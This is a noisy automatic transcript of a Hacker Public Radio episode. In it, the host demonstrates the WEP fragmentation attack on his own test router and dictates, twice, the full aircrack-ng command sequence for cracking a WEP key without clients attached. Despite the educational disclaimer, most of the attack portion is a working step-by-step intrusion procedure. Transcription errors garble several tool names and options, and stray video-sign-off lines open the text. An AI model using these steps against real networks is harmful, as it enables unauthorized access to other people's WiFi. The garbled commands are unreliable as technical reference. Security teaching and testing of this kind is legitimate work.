hpr-knowledge-base/hpr_transcripts/hpr0161.txt

Episode: 161
Title: HPR0161: Hacking WEP
Source: https://hub.hackerpublicradio.org/ccdn.php?filename=/eps/hpr0161/hpr0161.mp3
Transcribed: 2025-10-07 12:35:41

---

Subscribe to this channel.
Subscribe!
If you are free, click on the bell.
Thanks for to watch.
See you in the next videos!
Well hello, welcome to PR listness. This is Finix's student hackers guy Tillinix and surprise
surprise I'm your host Finix. Today I want to talk about the fragmentation attack used
for hacking web basically. Before I start off, there's a couple of things that I'd like
to quickly mention. First and foremost, I'm actually recording this slightly different
from the way that I normally record episodes like this. Normally I write a script and a
sort of script and I kind of stick around there and work with that. However, this time
I've kind of decided to just record and talk about it. Obviously if you like the way
that I used to do things, please drop us online. If I like the way that I used to do things,
I'll go back to the other way as well. So this is just kind of like a little experiment.
Hopefully it will be a bit better, but maybe not. I'd also like to take this opportunity
to apologise to Enigma and to you guys at HPR as well. I was booked into to release an
episode on 31st of July. However, I've started a new job and I also came down with a pretty
pretty tough viral infection. It's kind of had me pretty way laid for the past two weeks.
So if a coffin sneeze all the way through there, you'll know why. But I'm hoping that
this episode will go a long way to getting you guys to forgive me anyway. So that's kind
of the stuff I wanted to get out of the way first. So let's get onto the meat and potatoes
of what I'm talking about today. I've been very interested in WEP for quite some time.
The numbers of reasons why. I mean the reason that I do a lot of looking at WEP is that an awful
lot of people still use WEP, which always surprises me because the vulnerabilities in WEP
are not unknown. This is very well documented issues in WEP and have been quite some time.
However, there's still organisations and there's still businesses that are using it. And
it's a very, very vulnerable technology to say the least. The fragmentation attack came
around in about 2007. I don't really want to get overly technical about it. What I really
want to do is just kind of run through the attacks so that you guys can see how it works.
And then I'm going to release some sort of show notes over at the Linux Society. And
I'll give you the URL for that later on probably at the end. And in there, I'll put lists
of stuff that I refer to and packages that you'll need to install and maybe just a demo
of it. But what the fragmentation attack does is basically, I'll put some light on what
I was doing earlier on today with it. I set up a wireless network with a 128-bit random
WEP key. I then used a fragmentation attack to basically hack the wireless network. There
was no clients attached to the wireless network and I managed to produce the WEP key in less
than four minutes. I think it was about three minutes, 52 seconds if you're being precise.
And that's for 128-bit. When I did the same test on 64-bit, it took less than a minute.
By the time the package had loaded up, it told me what the key was. The big kind of indicators
here is that you don't need any clients attached to the wireless network. Some of you guys
that may have experienced in WEP hacking, maybe use the concept of needing to have people
associated with the wireless network to generate traffic to collect weak IVs that way. Well,
what this attack does is takes that whole need to have clients out. And what you do is you're
able to produce the traffic. And because you're able to produce the traffic, you're able
to get as many IVs as you need. Why I really kind of wanted to show light on this attack
is the reality of it is now when a hacker finds a wireless network that hands WEP encryption.
There isn't a real time deterrent for them anymore. I have to be honest with you. I mean,
the reason that WEP was used is that a vulnerability isn't WEP well known before it became popular.
But the argument was is that it would still be time consuming for a hacker to basically
hack WEP and that they would move to an open network. Well, the reality of this attack
now is this is not a question if the hacker can get onto the network. But more of a question
of it will take me five minutes until I get online. And that's pretty ill that that that's
no real deterrent. I'll have to dig up the paper, but I believe the Janet, which is the joint
academic network. Basically, it's kind of like an academic ISP in the UK. I have dropped
WEP. They don't recommend it. However, there is still UK ISPs that are sending out boxes
routers basically with 64-bit WEP encryption and they're sending these out to businesses and to
home. So I can't mention any names for obvious reasons. But yeah, this technology is this antiquated
technology that's causing problems that's very easy to crack is being shipped out left, right,
and centre. And the real issue with this is that it's a full sense of security that we're
offering people. They're not the sitting there thinking that the wireless network is secured.
And hopefully by the end of this episode today, I'll show you that it's far from being secured.
But yeah, I'm going to stop rambling and I suppose it's time to get onto the meeting potatoes
of what I'm actually going to talk about today. Okay, I suppose the next thing I need to do is do the
technology kind of health warnings and sort of disclaim a bit. Obviously I'm doing this for
educational purposes. I don't condone you hacking anyone's network. I don't promote it. If you go
and hack someone's wireless network and you don't have permission to do it and you get caught,
you're on your own. At the end of the day, this is purely for demonstration purposes.
Also, I'm not going to go through every possible combination of how you can do this.
The technology, the platform that I used today to do this hack is I use the Tripoli.
I've got a Ubuntu Tripoli running on there. Very nice. I must admit my commands are for that.
There is a distro called Backtrack 3. I'm sure most of you guys know it.
That has all the tools that you could possibly need to do this sort of attack on as well.
There's lots of options, but it's basically your prerogative to match your configurations to mine.
I suppose what we need to do now is get on with hacking a wireless network.
Some of the packages that you're going to need for this is going to be M on NG,
AirPlayNG, and PacketForgeNG and AircrackNG. You should be able to get most of these packages
through repository or download and compile from source. It should be pretty easy.
What I did just to give you a rough idea is I got a separate wireless router
so that I wasn't interfering with anyone's network and I set this up to be
called Finix Wireless Network, very originally I know. I then went to a website that generates random
keys and I generated a random 128 bit key and then used that.
Now before I start it's probably well worth mentioning that there's an absolute ton of video how
to guides that are probably going to do a job a lot better than I am. But if you just go on to
YouTube and do a search for web fragmentation attack there's tons and tons of really really good
how to guides on this. Like I said before this is not an undocumented hack by any imagination.
One that I saw that I thought was a very, very clever and often you find these clever things
are normally the simplest things. In this attack you need to call the MAC address of the AP
quite a bit. You need to call the MAC address of your wireless card quite a bit. What he did
right at the beginning of the attack was put in export space AP equals and then the MAC address
of the AP and then export the export space Wi-Fi equals and then the MAC address of his wireless card.
Which to be honest with you later on will make a lot more sense but what he then does
is in the commands he's able to call the variable which is a lot easier having to constantly
type in MAC address so I can tell you that for nothing. Some of the packages that you,
what the packages you are going to need you should find them in most packet repositories,
packet managers and you'll be able to go to the websites and stuff like that. There's a package
called Hermann-NG. You'll definitely need that. You'll definitely need AirPlay-NG.
You're definitely going to need a packet called packetforge-NG as well and I think you're going
to need to get a copy of AerodompNG and Aircrack as well. But anyway what I'll do is I'll go through
the commands that I've used and what I'll do is I'm just going to refer to AP when I'm meaning the
I'm going to say variable AP when I'm actually meaning the MAC address of the AP point and I'm
going to say variable Wi-Fi when I'm meaning the MAC address of the wireless card. I know this
sounds a little bit confusing but I'll try and write it on the show now so I'll make a lot more
sense. The first command, these are all root commands but because I've been using the bunto
they've all got pseudo before it. But like I say, these are work fine in a root terminal.
The first one I used was pseudo Hermann-NG start Wi-Fi 0 and what that did was that
cut that call there a month to start on. Basically my wireless card which is Wi-Fi 0. I used
pseudo while I'm config at 0, 80, 80, destroyed. I just got rid of anything in the at 0 section.
I did pseudo IF config at 1 up and at 1 is the device that I'm using for the hack.
The next one is pseudo IW config at 1 mode monitor channel 13. What this does is puts your card
into basically a promiscuous mode. The AP that I wanted to hack happened to be on channel 13.
I'm lucky for some. Next command, this is a bit of a mouthful so what it is is pseudo Airplay-NG
space-1, space-0, space-e and in here you want to put in the wireless networks name. So in my
case it's Phenix wireless network, space-a and in here you want to put the AP of the MAC address of
the AP. So what you would be able to do, variable AP if you did what I said earlier on.
Otherwise just paste in the MAC address of the one that you want to tack, space-h,
space. This will be your MAC address of your wireless card so if you declared that variable
it would have been dollar sign Wi-Fi, space-ath-1. So just kind of read that back without all the
stopping and starting. It's basically pseudo Airplay-NG space-i, space-0, space-e,
Phenix wireless network, space-a, space dollar sign AP, space-h, space dollar sign Wi-Fi, space-ath-1.
The next command that you want to use is pseudo Airplay-NG. So that pseudo Airplay-NG space-5,
space-b, dollar sign AP, space-h, space dollar sign Wi-Fi, space-ath-1. So basically that
is the pseudo Airplay-NG, dash 5, space-b, the MAC address of your AP so if you declared that variable
again this is this is why I said at the beginning it's well worth doing declaring that variable
because you just spend your lifetime putting these back in again. So pseudo Airplay, space-5,
space-b, space dollar sign AP, space-h, dollar sign Wi-Fi, space-ath-1. The next package that you
going to use is a package called packetforge-NG. Now this command is a bit of a mouthful so
what you'll find from the first command is that you get a package called fragment- whatever the
date of when you did it whatever the time was.xor and you'll be calling this the next command which
is there's no need for pseudo on this but it's packetforge-NG
space-0, space-a, space dollar sign AP, space-h, space dollar sign Wi-Fi, space-k, space-255,
255.255.255 space dash l space 255.255.255.255 space dash y the fragmentation
file.xor space dash w space up dash request okay so that's packet forge
space dash o space dash a the BSS ID MAC address dash h the MAC address of your
wireless card dash k space 255.255.255.255.255.255 space dash l space 255.255.255.255.255.
space dash y fragmentation file.xor space dash w up request okay what I'll do is
that'll forge a basically an up request okay the next command that you want
to run is pseudo arrow dump dash ng space dash c space 13 because that's
the the channel that I'm on space double dash BSS ID space dollar sign AP
space dash w space capture space at one okay what that'll do is that'll open up
terminal well that does that that that needs to run the background so what you
need once you've got that command or what you need to do now is moving to
another terminal make sure that you're certainly in there the working
directory where that art request that you use package for just for okay I'm
not a new terminal and it'll be pseudo airplay dash ng space dash two space dash r
space art request at one that's art dash request that's the file that we made
with packet forge okay and you need to leave that money in its own terminal and
then what you need to do is open up one more terminal and type in pseudo space
aircrack dash ng space dash z space star dot cap space dash said and what
this'll do is this all low dot everything that ends dot cap that you've been
making the past and it'll start running its attack against them and the great
great thing about this is is that this can run while you're collecting AVs okay
so what you should be left off with now is you should be left with three
terminal windows open okay one sending this forged art request one
monitoring the the downloads and collecting them and the other one cracking the
IVs okay and that's it that's it in a nutshell you should get a screen if
you're cracking 128 bit it'll probably take a couple of minutes if you're cracking
64 bit you should probably get a response pretty much within a minute and what
I will do is it will tell you that it's found the key and from there it'll
give you the hex that the hex for the the web or the uski as well okay so
quick run through those commands again okay is is first like you say my
recommendation is to put some variables at the beginning this so so like I say
it's probably best of the clear the variables now so export space AP equals
and then put the MAC address of the AP point there okay the next one would be
export space Wi-Fi equals the MAC address of your wireless card okay the
commands are as followed it's pseudo m on dash ng start Wi-Fi zero the next one is
pseudo while while I'm config space at zero destroy next one is pseudo IF
config at one up the next one is pseudo IW config at one mode monitor channel
13 the next one will be pseudo airplay dash ng space dash i space o space dash e
space phoenix wireless network in your case the wireless network that you're
packing dash a space dollar sign AP space dash h space dollar sign Wi-Fi space
at one okay next command pseudo airplay dash ng space dash 5 space dash b space
dollar sign AP space dash h space dollar sign Wi-Fi space at one okay the next one
is to use the packet forge program so like I say unless you need packet
forge dash ng space dash zero space dash a space dollar sign AP space dash h
space dollar sign Wi-Fi space dash k space okay 255.255.255.255.255.255.
space dash l space 255.255.255.255.255.255 space dash Y space fragmentation
file that you've made dot dot XOR space dash W space up dash request okay the next
command you need is pseudo aerodomp dash ng space dash c space channel 13
this is just the number of the don't type channel 13 just have pseudo aerodomp dash ng space
dash c space 13 space dash dash bss id space dollar sign AP space dash W space capture space
at one okay then you'll need to open up another terminal window and leave that running in there
and then in this one it would be say pseudo airplay dash ng space dash two dash r
up dash request at one so pseudo airplay dash ng space dash dash two space dash r space
up dash request space at one leave that running out another terminal window and then if you
type in the pseudo air crack dash ng space dash z space star dot cap space dash z and actually
crack your ivies for you well as promised there's some show notes to go along with this
podcast you can find it our website which is www.thelinuxsociety.org.uk that's www.thelinuxsociety.org.uk
and if you just go there and look for my blog it should be Finix's blog you'll find basically
a quick guide of how I did this any links or anything like that that I thought were interesting
all of that sort of stuff and that kind of brings us to the end I hope you've enjoyed it and
you know you've learned a little bit about how insecure web actually is
before I go I would just like to do a quick shout out to my pal Chad Wallenberg over at the
Linux basement a very cool Linux podcast I started off doing these things for him over there so
I'm here today thanks to to the Linux basement so a big shout out to you dude and keep on rocking
with those songs all right anyway thanks very much for listening guys and a little good night
you